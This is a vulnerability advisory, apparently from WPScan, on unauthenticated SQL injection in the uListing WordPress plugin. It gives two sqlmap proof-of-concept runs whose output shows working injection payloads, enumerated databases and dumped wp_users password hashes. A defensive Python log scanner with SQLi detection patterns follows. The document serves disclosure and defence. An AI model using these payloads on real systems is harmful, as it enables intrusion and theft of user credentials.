WPVDB-ID: 7B32E28E-9092-4ECC-95D0-A2B9464B4A9C

uListing < 2.0.4 - Unauthenticated SQL Injection

Published: 2021-07-26 00:00:00
Author: m0ze
Source: wpscan.com

An Unauthenticated SQL Injection vulnerability was discovered in the plugin. Vulnerable parameter(s): custom. SQL Injection type(s): Error-based, Boolean-based Blind, Time-based Blind.

PoC

PoC #1 | Unauthenticated SQL Injection | Tables:

sqlmap --url="https://example.com/?ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1" -p range[price] --dbs

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:47:59 /2021-06-18/

[16:47:59] [INFO] testing connection to the target URL
[16:48:11] [INFO] testing if the target URL content is stable
[16:48:25] [INFO] heuristic (basic) test shows that GET parameter 'range[price]' might be injectable (possible DBMS: 'MySQL')
[16:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:11] [WARNING] reflective value(s) found and filtering out
[16:51:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:52:02] [INFO] testing 'Generic inline queries'
[16:52:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:54:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:55:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[16:58:19] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:58:53] [INFO] GET parameter 'range[price]' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[16:58:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:59:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:59:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:59:33] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:59:35] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:59:38] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:59:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:59:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:59:51] [INFO] GET parameter 'range[price]' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[16:59:51] [INFO] testing 'MySQL inline queries'
[16:59:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:59:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:00:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:00:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:00:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:00:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:00:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:01:20] [INFO] GET parameter 'range[price]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:06:45] [INFO] target URL appears to be UNION injectable with 49 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[17:25:10] [INFO] testing 'MySQL UNION query (25) - 61 to 80 columns'
[17:26:04] [INFO] testing 'MySQL UNION query (25) - 81 to 100 columns'
GET parameter 'range[price]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests:
---
Parameter: range[price] (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) RLIKE (SELECT (CASE WHEN (4580=4580) THEN 0x313939383b32393739 ELSE 0x28 END)) AND (5841=5841&amenities[]=16&current_page=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 4060 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4201=4201&amenities[]=16&current_page=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 9207 FROM (SELECT(SLEEP(60)))BqKJ) AND (1336=1336&amenities[]=16&current_page=1
---
[18:16:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.28
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[18:16:03] [INFO] fetching database names
[18:16:03] [INFO] resumed: 'information_schema'
[18:16:03] [INFO] resumed: 'db_inusti'
[18:16:03] [INFO] resumed: 'db_tolips'
[18:16:03] [INFO] resumed: 'db_krowd'
[18:16:03] [INFO] resumed: 'db_halpes'
[18:16:03] [INFO] resumed: 'db_kitecx'
[18:16:03] [INFO] resumed: 'db_indutri'
[18:16:03] [INFO] resumed: 'db_codesk'
[18:16:03] [INFO] resumed: 'db_ziston'
available databases [9]:
[*] db_codesk
[*] db_halpes
[*] db_indutri
[*] db_inusti
[*] db_kitecx
[*] db_krowd
[*] db_tolips
[*] db_ziston
[*] information_schema

[*] ending @ 18:16:03 /2021-06-18/

PoC #2 | Unauthenticated SQL Injection | wp_users data:

sqlmap --url="https://example.com/?ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1" --dbms=MySQL -p bedrooms[],bathrooms[],garages[],amenities[] --dump -D db_halpes -T wp_users -C id,user_email,user_login,user_pass

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.4.7#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:15:24 /2021-06-18/

[10:15:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: bedrooms[] (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) RLIKE (SELECT (CASE WHEN (7907=7907) THEN 37 ELSE 0x28 END)) AND ((2011=2011&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) AND (SELECT 4032 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6842=6842&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) AND (SELECT 8493 FROM (SELECT(SLEEP(60)))bkzv) AND ((7707=7707&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1
---
[10:15:28] [INFO] testing MySQL
[10:15:30] [INFO] confirming MySQL
[10:15:32] [WARNING] reflective value(s) found and filtering out
[10:15:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.28
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[10:15:32] [INFO] fetching entries of column(s) 'id,user_email,user_login,user_pass' for table 'wp_users' in database 'db_halpes'
[10:15:37] [INFO] retrieved: '1'
[10:15:41] [INFO] retrieved: 'admin'
[10:15:44] [INFO] retrieved: '$P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/'
[10:15:46] [INFO] retrieved: '2'
[10:15:49] [INFO] retrieved: 'demo'
[10:15:51] [INFO] retrieved: '$P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3.'
[10:15:52] [INFO] retrieved: '3'
[10:15:55] [INFO] retrieved: 'give_donor'
[10:15:57] [INFO] retrieved: '$P$BUfswym5bmce6zMYuxpAv3J4992KyH.'
[10:15:58] [INFO] retrieved: '4'
[10:16:02] [INFO] retrieved: 'give_accountant'
[10:16:04] [INFO] retrieved: '$P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1'
[10:16:06] [INFO] retrieved: '5'
[10:16:09] [INFO] retrieved: 'give_manager'
[10:16:10] [INFO] retrieved: '$P$BsODaEu5jVKRPcp18M6KRbppca824U0'
[10:16:12] [INFO] retrieved: '6'
[10:16:15] [INFO] retrieved: 'give_worker'
[10:16:17] [INFO] retrieved: '$P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px.'
Database: db_halpes
Table: wp_users
[6 entries]
+----+------------+-----------------+------------------------------------+
| id | user_email | user_login      | user_pass                          |
+----+------------+-----------------+------------------------------------+
| 1  |            | admin           | $P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/ |
| 2  |            | demo            | $P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3. |
| 3  |            | give_donor      | $P$BUfswym5bmce6zMYuxpAv3J4992KyH. |
| 4  |            | give_accountant | $P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1 |
| 5  |            | give_manager    | $P$BsODaEu5jVKRPcp18M6KRbppca824U0 |
| 6  |            | give_worker     | $P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px. |
+----+------------+-----------------+------------------------------------+

[*] ending @ 11:03:34 /2021-06-18/
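Added example (Python), not part of the advisory and not the plugin's own code: a defender-side check for the listing filter parameters the PoC exercises. It does two things the sqlmap output above illustrates the need for: it parses a "low;high" range value into two bounded integers and rejects anything else (the shape of server-side fix that keeps attacker-controlled text out of the SQL), and it scans access-log lines for the three technique families the advisory names (boolean-based blind via RLIKE/CASE WHEN, error-based via FLOOR(RAND()), time-based blind via SLEEP) plus any filter value that does not fit its expected shape. Parameter names come from the PoC URL; the value schema, the signature set, the log lines, the IP addresses and all helper names are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Listing filter parameters as they appear in the advisory's PoC URL, with the
# value shape each should have. The schema is an assumption inferred from the
# PoC values for this example, not taken from the plugin's source.
INT_PARAMS = {"ulisitng_title", "region", "category", "current_page",
              "bedrooms[]", "bathrooms[]", "garages[]", "amenities[]"}
RANGE_PARAMS = {"range[area]", "range[price]"}

INT_RE = re.compile(r"^\d{1,9}$")
RANGE_RE = re.compile(r"^\d{1,9};\d{1,9}$")  # "low;high", e.g. 1998;2979

# Indicators of the three technique families the advisory lists; each one
# occurs in the sqlmap payloads shown in the PoC output above.
SQLI_SIGNATURES = {
    "boolean-based blind": re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(", re.I),
}

# Request target inside a combined-format access-log line.
LOG_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def parse_range(value):
    """Server-side parsing of a 'low;high' filter: two bounded ints or ValueError.
    Only the two integers should ever reach the query (as bound parameters);
    any other shape is rejected before SQL is built."""
    if not RANGE_RE.match(value):
        raise ValueError("range must be 'low;high' with two non-negative integers")
    low, high = (int(part) for part in value.split(";"))
    if low > high:
        raise ValueError("range lower bound exceeds upper bound")
    return low, high


def split_query(query):
    """Split a raw query string on '&' only (never on ';', which legitimate
    range values contain) and percent-decode names and values."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def value_is_well_formed(name, value):
    if name in INT_PARAMS:
        return bool(INT_RE.match(value))
    if name in RANGE_PARAMS:
        return bool(RANGE_RE.match(value))
    return True  # parameters outside the modelled set are not judged here


def classify_request(url):
    """Return [(parameter, reason)] for one listing-search request URL."""
    findings = []
    for name, value in split_query(urlsplit(url).query):
        for technique, pattern in SQLI_SIGNATURES.items():
            if pattern.search(value):
                findings.append((name, technique))
                break
        else:
            if not value_is_well_formed(name, value):
                findings.append((name, "malformed value"))
    return findings


def scan_access_log(lines):
    """Run classify_request over access-log lines; return [(line_no, findings)]
    for every line that produced at least one finding."""
    alerts = []
    for lineno, line in enumerate(lines, start=1):
        match = LOG_REQUEST_RE.search(line)
        if match:
            findings = classify_request(match.group(1))
            if findings:
                alerts.append((lineno, findings))
    return alerts


# Constructed access-log lines: one benign search, three requests carrying the
# PoC payloads percent-encoded as a web server would log them, one malformed.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jun/2021:16:47:59 +0000] "GET /?ulisitng_title=13&region=50&category=47&bedrooms[]=37&range[area]=739;1606&range[price]=1998;2979&current_page=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Jun/2021:16:58:53 +0000] "GET /?ulisitng_title=13&region=50&bedrooms[]=37))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7907=7907)%20THEN%2037%20ELSE%200x28%20END))%20AND%20((2011=2011&current_page=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Jun/2021:16:59:51 +0000] "GET /?ulisitng_title=13&range[price]=1998;2979)%20AND%20(SELECT%204060%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717171,(SELECT%20(ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20(4201=4201&current_page=1 HTTP/1.1" 500 312',
    '203.0.113.5 - - [18/Jun/2021:17:01:20 +0000] "GET /?ulisitng_title=13&range[price]=1998;2979)%20AND%20(SELECT%209207%20FROM%20(SELECT(SLEEP(60)))BqKJ)%20AND%20(1336=1336&current_page=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jun/2021:17:05:00 +0000] "GET /?range[price]=cheap&region=50 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for lineno, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {findings}")
```

The schema check matters as much as the signature list: a value like "1998;2979) AND ..." fails the range shape before any keyword is inspected, so a payload built to dodge the signatures still surfaces as "malformed value", and the same parse_range rule applied on the server keeps the value out of the query entirely.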

Affected software (CPE): ulisting, version < 2.0.4 (operator: lt)